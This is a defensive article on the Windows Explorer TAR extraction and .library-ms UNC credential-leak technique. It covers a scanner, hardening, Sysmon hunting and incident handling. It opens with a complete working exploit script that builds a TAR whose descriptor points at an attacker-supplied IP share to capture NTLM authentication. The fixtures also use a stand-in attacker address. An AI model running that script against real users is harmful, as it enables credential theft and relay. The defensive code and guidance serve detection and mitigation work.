Windows File Explorer Windows 10 Pro x64 - TAR Extraction

```python
import os
import tarfile


def main():
    file_name = input("Enter your file name: ")
    ip_address = input("Enter IP (EX: 192.168.1.162): ")
    # Library descriptor whose only location is a UNC share on the given host.
    # Explorer resolves that path when it processes the extracted file, which
    # sends the victim's NTLM authentication to the host.
    library_content = f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\\\{ip_address}\\IT</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
"""
    library_file_name = f"{file_name}.library-ms"
    with open(library_file_name, "w", encoding="utf-8") as f:
        f.write(library_content)
    # Pack the descriptor into a TAR and remove the loose file afterwards.
    tar_name = "exploit.tar"
    with tarfile.open(tar_name, "w") as tarf:
        tarf.add(library_file_name)
    if os.path.exists(library_file_name):
        os.remove(library_file_name)
    print("completed")


if __name__ == "__main__":
    main()
```

Windows File Explorer TAR Extraction and .library-ms UNC Attack — Overview for Defenders
This article explains a Windows-specific abuse pattern where a specially crafted TAR archive containing a .library-ms file can be used to trigger automatic resolution of a UNC path when extracted with Windows File Explorer. The goal here is defensive: explain the concept, identify why it matters, show a safe and sanitized code example, and provide mitigations, hunting strategies, and safe lab testing guidance for incident responders and system administrators.
What is a .library-ms file and why it matters
A .library-ms file is an XML-based descriptor used by Windows Libraries (File Explorer) to point to one or more folder locations. When a .library-ms file references a UNC path (\\server\share), Windows attempts to reach that location when the file is opened, and also when Explorer parses the descriptor while rendering the folder it sits in (for example, right after it has been extracted from an archive), so the user does not have to double-click anything. If the remote host asks for authentication, the SMB client answers with the logged-on user's NTLM credentials, which leaks a NetNTLMv2 challenge/response to an external SMB endpoint; that response can be cracked offline or, in environments without signing and NTLM restrictions, relayed.
High-level attack concept (defensive description)
- An adversary places a .library-ms file inside an archive (for example, a TAR archive).
- If a user extracts that archive using Windows File Explorer (or otherwise causes the .library-ms file to be loaded by Explorer), the .library-ms content may cause Explorer to resolve a UNC path.
- If the UNC path points to an adversary-controlled host, this can provoke outbound SMB authentication attempts from the victim machine, potentially allowing credential capture or relay depending on environment hardening.
Note: This summary intentionally omits step-by-step exploit instructions. The focus is on detection, mitigation, and safe handling.
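As an added example (not part of the original page, nor of the script at the top), here is a Python pre-extraction scanner for the format just described: it reads a TAR archive in memory, parses every .library-ms member, pulls each <url> out of the descriptor and decides whether Explorer would have to contact a remote host to resolve it. The archive, its member names and the 203.0.113.10 address (an IANA documentation range) are constructed fixtures for the demonstration; Windows does not ship such a tool.

```python
import io
import tarfile
import xml.etree.ElementTree as ET

# Constructed fixture: the UNC form the exploit script writes, pointing at a
# documentation address, plus a harmless library that points at a local folder.
SAMPLE_UNC_LIBRARY = r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\203.0.113.10\IT</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
"""
SAMPLE_LOCAL_LIBRARY = SAMPLE_UNC_LIBRARY.replace(r"\\203.0.113.10\IT",
                                                  r"C:\Users\Public\Documents")


def is_network_location(url):
    # True when Explorer must contact a remote host to resolve the location:
    # \\host\share, //host/share, \\?\UNC\host\share and file://host/share.
    # Drive paths, \\?\C:\... and file:///C:/... (empty authority) are local.
    p = url.strip().replace("/", "\\").lower()
    if p.startswith("file:"):
        p = p[len("file:"):]
        return p.startswith("\\\\") and not p.startswith("\\\\\\")
    if p.startswith("\\\\?\\"):
        return p.startswith("\\\\?\\unc\\")
    return p.startswith("\\\\")


def library_urls(xml_bytes):
    # Every <url> element whatever its namespace prefix; ET.ParseError propagates
    # so the caller can treat a malformed descriptor as suspicious.
    root = ET.fromstring(xml_bytes)
    return [(el.text or "").strip() for el in root.iter()
            if isinstance(el.tag, str) and el.tag.rsplit("}", 1)[-1] == "url"]


def scan_tar(tar_bytes):
    # Returns (member name, url, is_network) per location in each .library-ms
    # member; an unparseable descriptor is reported as (name, None, True).
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:*") as tarf:
        for member in tarf.getmembers():
            if not (member.isfile() and member.name.lower().endswith(".library-ms")):
                continue
            data = tarf.extractfile(member).read()
            try:
                urls = library_urls(data)
            except ET.ParseError:
                findings.append((member.name, None, True))
                continue
            findings.extend((member.name, u, is_network_location(u)) for u in urls)
    return findings


def build_sample_tar(members):
    # In-memory TAR from {name: text}; a fixture for the scanner, nothing hits disk.
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tarf:
        for name, text in members.items():
            data = text.encode("utf-8")
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tarf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def main():
    archive = build_sample_tar({
        "invoices/Q3_report.library-ms": SAMPLE_UNC_LIBRARY,
        "invoices/readme.txt": "plain text, ignored by the scanner",
        "invoices/Music.library-ms": SAMPLE_LOCAL_LIBRARY,
    })
    for name, url, network in scan_tar(archive):
        verdict = "NETWORK location, do not extract with Explorer" if network else "local"
        print(f"{name}: {url!r} -> {verdict}")


if __name__ == "__main__":
    main()
```

The scanner is deliberately conservative: a descriptor that does not parse is flagged rather than ignored, because Explorer's own parser may be more forgiving than ElementTree. Run it from a mail gateway or a download handler before the archive reaches a user's Explorer window.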
Sanitized example: creating a harmless .library-ms file in Python
```python
import os
import re
import tarfile
from xml.sax.saxutils import escape


def make_library_file(filename, local_path):
    # escape() only neutralises XML metacharacters (&, <, >) so the path cannot
    # break out of the <url> element; it does nothing about UNC syntax, so refuse
    # \\host\share, //host/share and file://host/... explicitly before writing.
    stripped = local_path.strip()
    if stripped.startswith(("\\\\", "//")) or re.match(r"file://[^/]", stripped, re.IGNORECASE):
        raise ValueError(f"refusing network location: {local_path!r}")
    safe_path = escape(local_path)
    content = f'''<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>{safe_path}</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
'''
    with open(filename, "w", encoding="utf-8") as fh:
        fh.write(content)


def make_tar(tarname, files):
    # Plain uncompressed TAR, the same container the abuse pattern uses.
    with tarfile.open(tarname, "w") as tarf:
        for f in files:
            tarf.add(f)


if __name__ == "__main__":
    # Example: use a local path only (no UNC \\server\share)
    libname = "safe_example.library-ms"
    make_library_file(libname, "file:///C:/Temp")
    make_tar("safe_example.tar", [libname])
    os.remove(libname)
```

Explanation:
- This sanitized snippet shows how a .library-ms XML file can be generated programmatically and placed into a TAR archive without referencing any network resource. Note the division of labour: escape() only neutralises XML metacharacters (&, <, >) so a path cannot inject extra elements into the descriptor; it does nothing about UNC syntax, which is why the function refuses paths that begin with \\ or // or carry a host in a file:// URI before anything is written.
- It uses a local file URI (file:///C:/Temp) so no network resolution is triggered. This is suitable for demonstration or lab use when you want to observe the archive format without causing network traffic.
- Do not relax that check to admit a UNC path (\\server\share) unless you are performing isolated, controlled testing in an air-gapped lab according to approved procedures.
Why defenders should care
- Untrusted archives opened in File Explorer can prompt the system to interact with network resources implicitly.
- These implicit outbound SMB interactions may reveal authentication material or enable relay/NTLM abuse in networks without proper protections.
- Attack surface is increased where users routinely open archive attachments or downloads with Explorer rather than a hardened unpacker.
Mitigations and hardening
Recommended defensive controls to reduce risk from this and similar patterns:
- Patch and update: Keep Windows and endpoint protection up to date so known behaviors and fixes are applied.
- Disable unnecessary services: Stop and disable the WebClient service on endpoints that do not need WebDAV. When a UNC path cannot be reached over SMB (for example because TCP 445 is blocked at the edge), Windows falls back to WebDAV over HTTP through WebClient, which can carry the same NTLM authentication; removing the service removes that fallback.
- Network segmentation and blocking: Block outbound SMB (TCP 445) and related ports to the internet and untrusted networks at the perimeter and host-based firewalls.
- Enforce SMB signing and restrict NTLM: SMB signing (and Extended Protection for Authentication on other services) defeats relay of a captured authentication, but not offline cracking of a NetNTLMv2 response. To keep the response from leaving the host at all, set the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to deny (with exceptions for known servers) and move to Kerberos-only authentication where possible; where NTLM must remain, strong passwords limit what a cracked response is worth.
- Endpoint controls: Restrict which applications can extract archives, and consider using dedicated, sandboxed archive tools for user-facing extraction.
- Least privilege: Limit local accounts and avoid cached credentials where possible. Avoid using privileged accounts for daily tasks.
Detection and hunting guidance
Signs of this pattern can be found both on endpoints and network sensors:
- Monitor for unexpected outbound SMB connections from user workstations, especially to external or new destinations.
- Look for authentication attempts (NetNTLMv2 challenge/response) originating from user workstations in network captures or from SMB gateways.
- Use endpoint telemetry (Sysmon, EDR) to detect file creation events (Sysmon Event ID 11) for .library-ms files in user temp folders or Downloads, and suspicious archive extraction activity.
- Correlate those file creations with subsequent network connections (Sysmon Event ID 3) to TCP 445/139 on the same host within a short window. The SMB redirector runs in the kernel, so the connection is attributed to the System process (PID 4) rather than to Explorer.exe; correlate by host and time, not by process tree. A WebDAV fallback shows up instead as an HTTP connection from the svchost.exe instance hosting the WebClient service.
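As an added example for this section (not from the original page), the following Python runs that correlation over a handful of constructed Sysmon-style events. Event IDs 11 (FileCreate) and 3 (NetworkConnect) are real Sysmon IDs; the hosts, users, timestamps and the 203.0.113.10 destination are invented, the internal ranges are RFC1918 plus loopback and link-local, and the five-minute window and the CIDR allowlist are assumptions to tune for your estate.

```python
import ipaddress
from datetime import datetime, timedelta

SMB_PORTS = {445, 139}
WINDOW = timedelta(minutes=5)
# Assumed "expected" SMB destinations: RFC1918, loopback, link-local.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]

# Constructed Sysmon-style events flattened to dicts; not real telemetry.
# 203.0.113.10 is a documentation address standing in for an attacker SMB host.
EVENTS = [
    {"ts": "2024-05-01T09:00:00", "host": "WS01", "id": 11,
     "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\alice\Downloads\invoices\Q3_report.library-ms"},
    # The SMB client is the kernel redirector, so Sysmon attributes the
    # connection to System (PID 4), not to explorer.exe.
    {"ts": "2024-05-01T09:00:04", "host": "WS01", "id": 3, "image": "System",
     "dst_ip": "203.0.113.10", "dst_port": 445},
    {"ts": "2024-05-01T09:01:00", "host": "WS01", "id": 3, "image": "System",
     "dst_ip": "10.0.0.5", "dst_port": 445},       # internal file server
    {"ts": "2024-05-01T10:30:00", "host": "WS02", "id": 3, "image": "System",
     "dst_ip": "203.0.113.10", "dst_port": 445},   # no library-ms drop beforehand
    {"ts": "2024-05-01T11:00:00", "host": "WS03", "id": 11,
     "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\bob\Documents\Music.library-ms"},
]


def is_external(ip, allowlist=()):
    # allowlist holds CIDR strings for sanctioned public file servers.
    addr = ipaddress.ip_address(ip)
    if any(addr in net for net in INTERNAL_NETS):
        return False
    return not any(addr in ipaddress.ip_network(cidr) for cidr in allowlist)


def library_drops(events):
    return [e for e in events
            if e["id"] == 11 and e.get("target", "").lower().endswith(".library-ms")]


def external_smb(events, allowlist=()):
    return [e for e in events
            if e["id"] == 3 and e.get("dst_port") in SMB_PORTS
            and is_external(e["dst_ip"], allowlist)]


def correlate(events, allowlist=(), window=WINDOW):
    # High: external SMB within `window` after a .library-ms landed on the same host.
    # Medium: external SMB with no such precursor (still unexpected from a workstation).
    alerts = []
    drops = library_drops(events)
    for conn in external_smb(events, allowlist):
        ct = datetime.fromisoformat(conn["ts"])
        dst = f"{conn['dst_ip']}:{conn['dst_port']}"
        match = None
        for drop in drops:
            lag = (ct - datetime.fromisoformat(drop["ts"])).total_seconds()
            if drop["host"] == conn["host"] and 0 <= lag <= window.total_seconds():
                match = (drop, lag)
                break
        if match:
            alerts.append({"severity": "high", "host": conn["host"], "dst": dst,
                           "file": match[0]["target"], "lag_s": match[1]})
        else:
            alerts.append({"severity": "medium", "host": conn["host"], "dst": dst,
                           "file": None, "lag_s": None})
    return alerts


if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print(alert)
```

The medium tier exists because the file-create event is easy to miss (a different archive tool, a descriptor dropped by a browser, or Sysmon not watching that directory); outbound SMB from a workstation to a non-internal address is worth a ticket on its own, and the .library-ms precursor only raises the priority.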
Safe testing and lab recommendations
If you need to reproduce the behavior for analysis, follow strict safe-testing practices:
- Always use an isolated, air-gapped or internally isolated lab environment that is not connected to production or the internet.
- Use private test hosts for SMB targets (e.g., a controlled SMB server you own) and ensure those hosts are instrumented for logging. Do not point to third-party hosts or attacker-controlled infrastructure.
- Use packet captures (Wireshark) and endpoint logging to observe behaviors. Ensure you have authorization to test the systems involved.
How to handle a suspected incident
- Contain: Block outbound SMB from the affected host and isolate it from the network.
- Collect: Preserve relevant logs (EDR, Sysmon, Windows Event logs), the suspicious archive, and network captures showing the SMB negotiation.
- Analyze: Determine whether an NTLM authentication actually completed with the destination (an NTLM challenge/response in the capture means the user's NetNTLMv2 response should be treated as compromised), whether the destination host is trusted, and whether lateral movement occurred.
- Remediate: Reset affected credentials, review account usage, and patch/harden systems per the mitigations above.
Summary table — quick reference
| Concern | Defensive Action |
|---|---|
| Implicit UNC resolution via file | Disable WebClient where appropriate; restrict which apps extract archives |
| Outbound SMB to untrusted hosts | Block SMB egress; network segmentation |
| NTLM credential capture | Deny outgoing NTLM to remote servers; enforce SMB signing (blocks relay); strong passwords (captured NetNTLMv2 is crackable offline) |
| Detection gaps | Enable Sysmon/EDR, log file creation (.library-ms), and alert on unusual SMB auth |